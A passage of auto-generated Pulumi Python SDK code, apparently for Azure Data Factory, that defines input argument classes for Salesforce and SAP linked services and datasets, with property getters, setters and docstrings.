def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter(name="useEncryptedEndpoints")
def use_encrypted_endpoints(self) -> Optional[Any]:
"""
Specifies whether the data source endpoints are encrypted using HTTPS. The default value is true. Type: boolean (or Expression with resultType boolean).
"""
return pulumi.get(self, "use_encrypted_endpoints")
@use_encrypted_endpoints.setter
def use_encrypted_endpoints(self, value: Optional[Any]):
pulumi.set(self, "use_encrypted_endpoints", value)
@property
@pulumi.getter(name="useHostVerification")
def use_host_verification(self) -> Optional[Any]:
"""
Specifies whether to require the host name in the server's certificate to match the host name of the server when connecting over SSL. The default value is true. Type: boolean (or Expression with resultType boolean).
"""
return pulumi.get(self, "use_host_verification")
@use_host_verification.setter
def use_host_verification(self, value: Optional[Any]):
pulumi.set(self, "use_host_verification", value)
@property
@pulumi.getter(name="usePeerVerification")
def use_peer_verification(self) -> Optional[Any]:
"""
Specifies whether to verify the identity of the server when connecting over SSL. The default value is true. Type: boolean (or Expression with resultType boolean).
"""
return pulumi.get(self, "use_peer_verification")
@use_peer_verification.setter
def use_peer_verification(self, value: Optional[Any]):
pulumi.set(self, "use_peer_verification", value)
@pulumi.input_type
class SalesforceMarketingCloudObjectDatasetArgs:
def __init__(__self__, *,
linked_service_name: pulumi.Input['LinkedServiceReferenceArgs'],
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
description: Optional[pulumi.Input[str]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
structure: Optional[Any] = None):
"""
Salesforce Marketing Cloud dataset.
:param pulumi.Input['LinkedServiceReferenceArgs'] linked_service_name: Linked service reference.
:param pulumi.Input[str] type: Type of dataset.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input[str] description: Dataset description.
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for dataset.
:param Any structure: Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
pulumi.set(__self__, "linked_service_name", linked_service_name)
pulumi.set(__self__, "type", 'SalesforceMarketingCloudObject')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if description is not None:
pulumi.set(__self__, "description", description)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if structure is not None:
pulumi.set(__self__, "structure", structure)
@property
@pulumi.getter(name="linkedServiceName")
def linked_service_name(self) -> pulumi.Input['LinkedServiceReferenceArgs']:
"""
Linked service reference.
"""
return pulumi.get(self, "linked_service_name")
@linked_service_name.setter
def linked_service_name(self, value: pulumi.Input['LinkedServiceReferenceArgs']):
pulumi.set(self, "linked_service_name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of dataset.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Dataset description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for dataset.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def structure(self) -> Optional[Any]:
"""
Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
return pulumi.get(self, "structure")
@structure.setter
def structure(self, value: Optional[Any]):
pulumi.set(self, "structure", value)
@pulumi.input_type
class SalesforceObjectDatasetArgs:
def __init__(__self__, *,
linked_service_name: pulumi.Input['LinkedServiceReferenceArgs'],
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
description: Optional[pulumi.Input[str]] = None,
object_api_name: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
structure: Optional[Any] = None):
"""
The Salesforce object dataset.
:param pulumi.Input['LinkedServiceReferenceArgs'] linked_service_name: Linked service reference.
:param pulumi.Input[str] type: Type of dataset.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input[str] description: Dataset description.
:param Any object_api_name: The Salesforce object API name. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for dataset.
:param Any structure: Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
pulumi.set(__self__, "linked_service_name", linked_service_name)
pulumi.set(__self__, "type", 'SalesforceObject')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if description is not None:
pulumi.set(__self__, "description", description)
if object_api_name is not None:
pulumi.set(__self__, "object_api_name", object_api_name)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if structure is not None:
pulumi.set(__self__, "structure", structure)
@property
@pulumi.getter(name="linkedServiceName")
def linked_service_name(self) -> pulumi.Input['LinkedServiceReferenceArgs']:
"""
Linked service reference.
"""
return pulumi.get(self, "linked_service_name")
@linked_service_name.setter
def linked_service_name(self, value: pulumi.Input['LinkedServiceReferenceArgs']):
pulumi.set(self, "linked_service_name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of dataset.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Dataset description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="objectApiName")
def object_api_name(self) -> Optional[Any]:
"""
The Salesforce object API name. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "object_api_name")
@object_api_name.setter
def object_api_name(self, value: Optional[Any]):
pulumi.set(self, "object_api_name", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for dataset.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def structure(self) -> Optional[Any]:
"""
Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
return pulumi.get(self, "structure")
@structure.setter
def structure(self, value: Optional[Any]):
pulumi.set(self, "structure", value)
@pulumi.input_type
class SapBWLinkedServiceArgs:
def __init__(__self__, *,
client_id: Any,
server: Any,
system_number: Any,
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
encrypted_credential: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
password: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
user_name: Optional[Any] = None):
"""
SAP Business Warehouse Linked Service.
:param Any client_id: Client ID of the client on the BW system. (Usually a three-digit decimal number represented as a string) Type: string (or Expression with resultType string).
:param Any server: Host name of the SAP BW instance. Type: string (or Expression with resultType string).
:param Any system_number: System number of the BW system. (Usually a two-digit decimal number represented as a string.) Type: string (or Expression with resultType string).
:param pulumi.Input[str] type: Type of linked service.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param pulumi.Input[str] description: Linked service description.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] password: Password to access the SAP BW server.
:param Any user_name: Username to access the SAP BW server. Type: string (or Expression with resultType string).
"""
pulumi.set(__self__, "client_id", client_id)
pulumi.set(__self__, "server", server)
pulumi.set(__self__, "system_number", system_number)
pulumi.set(__self__, "type", 'SapBW')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if description is not None:
pulumi.set(__self__, "description", description)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if password is not None:
pulumi.set(__self__, "password", password)
if user_name is not None:
pulumi.set(__self__, "user_name", user_name)
@property
@pulumi.getter(name="clientId")
def client_id(self) -> Any:
"""
Client ID of the client on the BW system. (Usually a three-digit decimal number represented as a string) Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "client_id")
@client_id.setter
def client_id(self, value: Any):
pulumi.set(self, "client_id", value)
@property
@pulumi.getter
def server(self) -> Any:
"""
Host name of the SAP BW instance. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "server")
@server.setter
def server(self, value: Any):
pulumi.set(self, "server", value)
@property
@pulumi.getter(name="systemNumber")
def system_number(self) -> Any:
"""
System number of the BW system. (Usually a two-digit decimal number represented as a string.) Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "system_number")
@system_number.setter
def system_number(self, value: Any):
pulumi.set(self, "system_number", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
Password to access the SAP BW server.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter(name="userName")
def user_name(self) -> Optional[Any]:
"""
Username to access the SAP BW server. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "user_name")
@user_name.setter
def user_name(self, value: Optional[Any]):
pulumi.set(self, "user_name", value)
@pulumi.input_type
class SapCloudForCustomerLinkedServiceArgs:
def __init__(__self__, *,
type: pulumi.Input[str],
url: Any,
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
encrypted_credential: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
password: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
username: Optional[Any] = None):
"""
Linked service for SAP Cloud for Customer.
:param pulumi.Input[str] type: Type of linked service.
:param Any url: The URL of SAP Cloud for Customer OData API. For example, '[https://[tenantname].crm.ondemand.com/sap/c4c/odata/v1]'. Type: string (or Expression with resultType string).
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param pulumi.Input[str] description: Linked service description.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Either encryptedCredential or username/password must be provided. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] password: The password for Basic authentication.
:param Any username: The username for Basic authentication. Type: string (or Expression with resultType string).
"""
pulumi.set(__self__, "type", 'SapCloudForCustomer')
pulumi.set(__self__, "url", url)
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if description is not None:
pulumi.set(__self__, "description", description)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if password is not None:
pulumi.set(__self__, "password", password)
if username is not None:
pulumi.set(__self__, "username", username)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def url(self) -> Any:
"""
The URL of SAP Cloud for Customer OData API. For example, '[https://[tenantname].crm.ondemand.com/sap/c4c/odata/v1]'. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "url")
@url.setter
def url(self, value: Any):
pulumi.set(self, "url", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Either encryptedCredential or username/password must be provided. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
The password for Basic authentication.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter
def username(self) -> Optional[Any]:
"""
The username for Basic authentication. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "username")
@username.setter
def username(self, value: Optional[Any]):
pulumi.set(self, "username", value)
@pulumi.input_type
class SapCloudForCustomerResourceDatasetArgs:
def __init__(__self__, *,
linked_service_name: pulumi.Input['LinkedServiceReferenceArgs'],
path: Any,
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
description: Optional[pulumi.Input[str]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
structure: Optional[Any] = None):
"""
The path of the SAP Cloud for Customer OData entity.
:param pulumi.Input['LinkedServiceReferenceArgs'] linked_service_name: Linked service reference.
:param Any path: The path of the SAP Cloud for Customer OData entity. Type: string (or Expression with resultType string).
:param pulumi.Input[str] type: Type of dataset.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input[str] description: Dataset description.
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for dataset.
:param Any structure: Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
pulumi.set(__self__, "linked_service_name", linked_service_name)
pulumi.set(__self__, "path", path)
pulumi.set(__self__, "type", 'SapCloudForCustomerResource')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if description is not None:
pulumi.set(__self__, "description", description)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if structure is not None:
pulumi.set(__self__, "structure", structure)
@property
@pulumi.getter(name="linkedServiceName")
def linked_service_name(self) -> pulumi.Input['LinkedServiceReferenceArgs']:
"""
Linked service reference.
"""
return pulumi.get(self, "linked_service_name")
@linked_service_name.setter
def linked_service_name(self, value: pulumi.Input['LinkedServiceReferenceArgs']):
pulumi.set(self, "linked_service_name", value)
@property
@pulumi.getter
def path(self) -> Any:
"""
The path of the SAP Cloud for Customer OData entity. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "path")
@path.setter
def path(self, value: Any):
pulumi.set(self, "path", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of dataset.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Dataset description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for dataset.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def structure(self) -> Optional[Any]:
"""
Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
return pulumi.get(self, "structure")
@structure.setter
def structure(self, value: Optional[Any]):
pulumi.set(self, "structure", value)
@pulumi.input_type
class SapEccLinkedServiceArgs:
def __init__(__self__, *,
type: pulumi.Input[str],
url: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
encrypted_credential: Optional[pulumi.Input[str]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
password: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
username: Optional[pulumi.Input[str]] = None):
"""
Linked service for SAP ERP Central Component(SAP ECC).
:param pulumi.Input[str] type: Type of linked service.
:param pulumi.Input[str] url: The URL of SAP ECC OData API. For example, '[https://hostname:port/sap/opu/odata/sap/servicename/]'. Type: string (or Expression with resultType string).
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param pulumi.Input[str] description: Linked service description.
:param pulumi.Input[str] encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Either encryptedCredential or username/password must be provided. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] password: The password for Basic authentication.
:param pulumi.Input[str] username: The username for Basic authentication. Type: string (or Expression with resultType string).
"""
pulumi.set(__self__, "type", 'SapEcc')
pulumi.set(__self__, "url", url)
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if description is not None:
pulumi.set(__self__, "description", description)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if password is not None:
pulumi.set(__self__, "password", password)
if username is not None:
pulumi.set(__self__, "username", username)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def url(self) -> pulumi.Input[str]:
"""
The URL of SAP ECC OData API. For example, '[https://hostname:port/sap/opu/odata/sap/servicename/]'. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "url")
@url.setter
def url(self, value: pulumi.Input[str]):
pulumi.set(self, "url", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[pulumi.Input[str]]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Either encryptedCredential or username/password must be provided. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
The password for Basic authentication.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter
def username(self) -> Optional[pulumi.Input[str]]:
"""
The username for Basic authentication. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "username")
@username.setter
def username(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "username", value)
@pulumi.input_type
class SapEccResourceDatasetArgs:
def __init__(__self__, *,
linked_service_name: pulumi.Input['LinkedServiceReferenceArgs'],
path: Any,
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
description: Optional[pulumi.Input[str]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
structure: Optional[Any] = None):
"""
The path of the SAP ECC OData entity.
:param pulumi.Input['LinkedServiceReferenceArgs'] linked_service_name: Linked service reference.
:param Any path: The path of the SAP ECC OData entity. Type: string (or Expression with resultType string).
:param pulumi.Input[str] type: Type of dataset.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input[str] description: Dataset description.
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for dataset.
:param Any structure: Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
pulumi.set(__self__, "linked_service_name", linked_service_name)
pulumi.set(__self__, "path", path)
pulumi.set(__self__, "type", 'SapEccResource')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if description is not None:
pulumi.set(__self__, "description", description)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if structure is not None:
pulumi.set(__self__, "structure", structure)
@property
@pulumi.getter(name="linkedServiceName")
def linked_service_name(self) -> pulumi.Input['LinkedServiceReferenceArgs']:
"""
Linked service reference.
"""
return pulumi.get(self, "linked_service_name")
@linked_service_name.setter
def linked_service_name(self, value: pulumi.Input['LinkedServiceReferenceArgs']):
pulumi.set(self, "linked_service_name", value)
@property
@pulumi.getter
def path(self) -> Any:
"""
The path of the SAP ECC OData entity. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "path")
@path.setter
def path(self, value: Any):
pulumi.set(self, "path", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of dataset.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Dataset description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for dataset.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def structure(self) -> Optional[Any]:
"""
Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
return pulumi.get(self, "structure")
@structure.setter
def structure(self, value: Optional[Any]):
pulumi.set(self, "structure", value)
@pulumi.input_type
class SapHanaLinkedServiceArgs:
def __init__(__self__, *,
server: Any,
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
authentication_type: Optional[pulumi.Input[str]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
encrypted_credential: Optional[Any] = None,
